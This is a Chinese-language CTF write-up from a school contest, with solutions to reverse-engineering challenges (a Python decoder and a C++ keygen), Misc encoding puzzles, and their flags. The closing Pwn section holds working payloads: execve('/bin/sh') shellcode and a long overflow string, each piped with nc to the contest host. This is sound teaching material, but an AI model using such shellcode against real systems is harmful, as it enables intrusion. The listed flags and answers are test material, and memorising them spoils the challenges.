马上就要2022年了,人却被困在学校回不去。

但这并不影响我写个WriteUp,是时候该整理一下今年见到的东西了。

12-23 5点钟加了个Pwn的题解

Reverse

逆向的题都是从不同地方抄来的(属实太菜,想不出人家的脑洞)

但都是比赛真题,不知道能否给大家带来些启发

easy_py

介绍语:一道简单的Python逆向

分数:100

源码可以通过

https://tool.lu/pyc/

或uncompyle6反编译

uncompyle6 ‐o 1.py ./easy_py.pyc

题解:

该题是创建了个全局变量,通过两个线程将其进行递减,并进行相关算法:将输入的数据从后往前(37~0),按照列表顺序,当顺序号为:

奇数执行 t1 线程算法:将该数据与顺序进行异或

偶数执行 t2 线程算法:将该数据与后一个数据进行异或

flag=[
     23, 72, 77, 125, 115, 74, 27, 98, 23, 87, 0, 95]
j=0
for i in flag:
    if j%2==0:
        flag[j]=flag[j]^flag[j+1]
        j+=1
    else:
        flag[j]=flag[j]^j
        j+=1

for i in range(len(flag)):
    flag[i]=chr(flag[i])
flagstr=''
flagstr=''.join(flag)

print(flagstr)
flag{_I0~9Oye@^_T}

easy_crack

介绍语:无

分数:200

Vivo千镜杯的题目,这是第一次做到这么简单的移动逆向,打开GDA基本就能得出结果image-20211223154017094.png

flag{vivoNeedYou}

Good_old_day

介绍语:正统C++逆向,第一次校赛的题目,分析算法写出注册机,用户名为CTFHUB,flag{Serial Number},使用x64dbg等工具有助于理解

分数:200

如果没人做出来给的Hint:看雪CTF——国色天香

题解:

https://blog.csdn.net/henuyl/article/details/107046902

//
// Created by Administrator on 2021/10/22.
//
#include <iostream>
#include <cstdio>
#include <cstring>

using namespace std;
char uName[25] = {0};
char uNameKey[25] = {0};
char uKey[25] = {0};

int main(int argc)
{
	cout << "please press your username..." << endl;
	int ebx = 0;
	int ecx = 0;
	int edx = 0;
	while(~scanf("%s", uName)){
		int uNameLen = strlen(uName);
		if(uNameLen == 0){
			cout << "Enter Name!" << endl;
			continue;
		}else if(uNameLen > 0x20){
			cout << "Name can be max 32 Chars long!" << endl;
			continue;
		}else if(uNameLen < 5){
			cout << "Name must be min 5 Chars long!" << endl;
			continue;
		}
		break;
	}

	ecx = 0;
	int al = 0x5;
	edx = 0;
	while(true){
		int cl = uName[edx];
		cl = cl ^ 0x29;
		cl = cl + al;
		if(cl < 0x41 || cl > 0x5A){
			cl = 0x52;
			cl = cl + al;
		}
		uNameKey[edx] = cl;
		uNameKey[edx + 1] = 0x0;
		edx ++;
		al --;
		if(al == 0) break;
	}
	edx = 0;
	al = 5;
	while(true){
		int cl = uName[edx];
		cl = cl ^ 0x27;
		cl = cl + al;
		if(cl < 0x41 || cl > 0x5A){
			cl = 0x4D;
			cl = cl + al;
		}
		uNameKey[edx + 5] = cl;
		uNameKey[edx + 5 + 1] = 0x0;
		edx ++;
		al --;
		if(al == 0) break;
	}
	uNameKey[10] = '\0';
	printf("uNameKey = %s\n", uNameKey);
	ebx = 0;
	ecx = 0;
	edx = 0;

	while(true){

		int dl = uNameKey[ecx];
		if(dl == 0x0){
			break;
		}
		dl += 0x5;
		if(dl > 0x5a){
			dl -= 0xd;
		}
		dl = dl ^ 0xc;
		if(dl < 0x41){
			dl = 0x4b;
			dl += ecx;
		}
		if(dl > 0x5A){
			dl = 0x4b;
			dl -= ecx;
		}
		uKey[ecx] = dl;
		ecx ++;
	}
	uKey[ecx] = '\0';

	printf("uKey = %s\n", uKey);
	getchar();
	getchar();
	return 0;
}

补充一下,配合IDA的话效率会高些(会发现与题解的相似之处)

image-20211223162137610.png

flag{CBVUTFZYXB}

Misc

奇奇怪怪的编码

介绍语:在CTF的Misc中,总能遇到些奇奇怪怪的编码,使用 CTF在线工具 则可以事半功倍

分数:100

文件:testflag.pdf

思路来源:2021极客谷杯

编码1:泡泡牙牙学语
xinik-samak-luvah-bosik-cysel-funox

编码2: JJ
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"_"+$.___+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.__$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$_$_+"\\"+$.__$+$.$_$+$.___+"}"+"\"")())();

编码1:气泡加密-bubble

http://www.hiencode.com/bubble.html

编码2:JJ编码

http://www.hiencode.com/jjencode.html

flag{Pra1se_0mn1ssiah}

PDF

介绍语:一个很普通的PDF文件

分数:200

文件:testflag.pdf

思路来源:攻防世界-PDF

百度一堆答案,我自己做的时候格式工厂PDF转word,马上就出来了

flag{Warhamm3r_4k_is_ok}

Pwn

受Pwn出题人委托,挂上PWN的题解

居然没人做Pwn,可惜了

shellcode

#/bin/sh
(echo -en "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05";cat)|nc xaut.team 4002

Overflow

#/bin/sh
(python -c "print('a'*0x801)";cat)|nc xaut.team 4001